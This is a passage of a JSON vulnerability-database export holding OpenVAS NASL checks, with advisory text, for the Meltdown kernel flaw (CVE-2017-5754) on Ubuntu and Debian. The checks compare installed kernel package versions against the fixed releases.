exit(0);\n}\n\nexit(99);", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-05-29T18:33:18", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-01-11T00:00:00", "type": "openvas", "title": "Ubuntu Update for linux USN-3522-3", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5754"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310843414", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843414", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3522_3.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux USN-3522-3\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843414\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-01-11 07:38:35 +0100 (Thu, 11 Jan 2018)\");\n script_cve_id(\"CVE-2017-5754\");\n script_tag(name:\"cvss_base\", value:\"4.7\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-3522-3\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"USN-3522-1 fixed a vulnerability in the\n Linux kernel to address Meltdown (CVE-2017-5754). Unfortunately, that update\n introduced a regression where a few systems failed to boot successfully. This\n update fixes the problem. We apologize for the inconvenience. Original advisory\n details: Jann Horn discovered that microprocessors utilizing speculative\n execution and indirect branch prediction may allow unauthorized memory reads via\n sidechannel attacks. This flaw is known as Meltdown. A local attacker could use\n this to expose sensitive information, including kernel memory.\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 16.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3522-3\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3522-3/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-109-generic\", ver:\"4.4.0-109.132\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-109-lowlatency\", ver:\"4.4.0-109.132\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic\", ver:\"4.4.0.109.114\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency\", ver:\"4.4.0.109.114\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-05-29T18:33:21", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2018-01-10T00:00:00", "type": "openvas", "title": "Ubuntu Update for linux-aws USN-3522-2", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5754"], "modified": "2019-03-13T00:00:00", "id": "OPENVAS:1361412562310843413", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843413", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3522_2.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux-aws USN-3522-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843413\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-01-10 07:40:12 +0100 (Wed, 10 Jan 2018)\");\n script_cve_id(\"CVE-2017-5754\");\n script_tag(name:\"cvss_base\", value:\"4.7\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-aws USN-3522-2\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-aws'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"USN-3522-1 fixed vulnerabilities in the\n Linux kernel for Ubuntu 16.04 LTS. This update provides the corresponding\n updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for\n Ubuntu 14.04 LTS. Jann Horn discovered that microprocessors utilizing\n speculative execution and indirect branch prediction may allow unauthorized\n memory reads via sidechannel attacks. This flaw is known as Meltdown. A local\n attacker could use this to expose sensitive information, including kernel\n memory. (CVE-2017-5754)\");\n script_tag(name:\"affected\", value:\"linux-aws on Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3522-2\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3522-2/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU14\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-1009-aws\", ver:\"4.4.0-1009.9\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-108-generic\", ver:\"4.4.0-108.131~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.4.0-108-lowlatency\", ver:\"4.4.0-108.131~14.04.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-aws\", ver:\"4.4.0.1009.9\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lts-xenial\", ver:\"4.4.0.108.91\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency-lts-xenial\", ver:\"4.4.0.108.91\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2019-07-04T18:56:27", "description": "Multiple researchers have discovered a vulnerability in Intel processors,\nenabling an attacker controlling an unprivileged process to read memory from\narbitrary addresses, including from the kernel and all other processes running\non the system.\n\nThis specific attack has been named Meltdown and is addressed in the Linux\nkernel for the Intel x86-64 architecture by a patch set named Kernel Page Table\nIsolation, enforcing a near complete separation of the kernel and userspace\naddress maps and preventing the attack. This solution might have a performance\nimpact, and can be disabled at boot time by passing pti=off\nto the\nkernel command line.\n\nWe also identified a regression for ancient userspaces using the vsyscall\ninterface, for example chroot and containers using (e)glibc 2.13 and older,\nincluding those based on Debian 7 or RHEL/CentOS 6. This regression will be\nfixed in a later update.\n\nThe other vulnerabilities (named Spectre) published at the same time are not\naddressed in this update and will be fixed in a later update.", "cvss3": {}, "published": "2018-01-04T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 4078-1 (linux - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-5754"], "modified": "2019-07-04T00:00:00", "id": "OPENVAS:1361412562310704078", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704078", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Auto-generated from advisory DSA 4078-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704078\");\n script_version(\"2019-07-04T09:25:28+0000\");\n script_cve_id(\"CVE-2017-5754\");\n script_name(\"Debian Security Advisory DSA 4078-1 (linux - security update)\");\n script_tag(name:\"last_modification\", value:\"2019-07-04 09:25:28 +0000 (Thu, 04 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-01-04 00:00:00 +0100 (Thu, 04 Jan 2018)\");\n script_tag(name:\"cvss_base\", value:\"4.7\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:N/A:N\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2018/dsa-4078.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB9\");\n script_tag(name:\"affected\", value:\"linux on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the oldstable distribution (jessie), this problem will be fixed in a\nseparate update.\n\nFor the stable distribution (stretch), this problem has been fixed in\nversion 4.9.65-3+deb9u2.\n\nWe recommend that you upgrade your linux packages.\");\n\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/linux\");\n script_tag(name:\"summary\", value:\"Multiple researchers have discovered a vulnerability in Intel processors,\nenabling an attacker controlling an unprivileged process to read memory from\narbitrary addresses, including from the kernel and all other processes running\non the system.\n\nThis specific attack has been named Meltdown and is addressed in the Linux\nkernel for the Intel x86-64 architecture by a patch set named Kernel Page Table\nIsolation, enforcing a near complete separation of the kernel and userspace\naddress maps and preventing the attack. This solution might have a performance\nimpact, and can be disabled at boot time by passing pti=off\nto the\nkernel command line.\n\nWe also identified a regression for ancient userspaces using the vsyscall\ninterface, for example chroot and containers using (e)glibc 2.13 and older,\nincluding those based on Debian 7 or RHEL/CentOS 6. This regression will be\nfixed in a later update.\n\nThe other vulnerabilities (named Spectre) published at the same time are not\naddressed in this update and will be fixed in a later update.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"hyperv-daemons\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libcpupower-dev\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libcpupower1\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"libusbip-dev\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-compiler-gcc-6-arm\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-compiler-gcc-6-s390\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-compiler-gcc-6-x86\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-cpupower\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-doc-4.9\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-4kc-malta\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-5kc-malta\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-686\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-686-pae\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-all\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-all-amd64\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-all-arm64\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-all-armel\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-all-armhf\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-all-i386\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-all-mips\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-all-mips64el\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-all-mipsel\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-all-ppc64el\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-all-s390x\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-amd64\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-arm64\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-armmp\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-armmp-lpae\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-common\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-common-rt\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-loongson-3\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-marvell\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-octeon\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-powerpc64le\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-rt-686-pae\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-rt-amd64\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-3-s390x\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-4kc-malta\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-5kc-malta\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-686\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-686-pae\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-all\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-all-amd64\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-all-arm64\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-all-armel\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-all-armhf\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-all-i386\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-all-mips\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-all-mips64el\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-all-mipsel\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-all-ppc64el\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-all-s390x\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-amd64\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-arm64\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-armmp\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-armmp-lpae\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-common\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-common-rt\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-loongson-3\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-marvell\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-octeon\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-powerpc64le\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-rt-686-pae\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-rt-amd64\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-4-s390x\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-5-4kc-malta\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-5-5kc-malta\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-5-686\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-5-686-pae\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-5-all\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-5-all-amd64\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-5-all-arm64\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-5-all-armel\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-5-all-armhf\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-5-all-i386\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-5-all-mips\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-5-all-mips64el\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-5-all-ppc64el\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-5-all-s390x\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-5-amd64\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-5-arm64\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-5-armmp\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-5-armmp-lpae\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-5-common\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-5-common-rt\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-5-loongson-3\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-5-marvell\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-5-octeon\", ver:\"4.9.65-3+deb9u2\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"linux-headers-4.9.0-5-powerpc64le\", 